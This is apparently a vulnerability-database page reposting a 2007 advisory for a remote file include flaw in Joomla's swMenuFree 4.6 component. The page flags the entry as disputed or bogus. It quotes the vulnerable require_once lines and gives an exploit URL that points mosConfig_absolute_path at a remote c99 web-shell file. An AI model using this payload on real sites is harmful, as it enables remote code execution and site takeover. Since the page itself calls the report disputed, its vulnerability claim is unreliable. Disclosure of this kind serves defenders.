Joomla! swMenuFree 4.6 Component Remote File Include

WARNING! Fake news / Disputed / BOGUS

Joomla! swMenuFree 4.6 Component Remote File Include

2007.10.12

Credit: 0x90

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-5389

CWE: CWE-94

CVSS Base Score: 6.8/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

#Joomla! swMenuFree 4.6 Component Remote File Include
#Found by 0x90
#WwW.0x90.CoM.Ar
#Download: http://www.swmenupro.com/index.php?option=com_remository&Itemid=298&func
=fileinfo&id=12
#dork: No dork for script kiddies.. :)
#BUG:
preview.php:12: require_once($mosConfig_absolute_path ."/modules/mod_swmenufree/styles.php"); // <-- RFI
preview.php:13: require_once($mosConfig_absolute_path ."/modules/mod_swmenufree/functions.php"); // <-- RFI
#Expl0it:
http://www.site.com/components/com_swmenufree/preview.php?mosConfig_abso
lute_path=http://scriptkiddie.com/c99haxor.txt?
#Contact: Guns [at] 0x90 [dot] com [dot] ar

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla! swMenuFree 4.6 Component Remote File Include

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.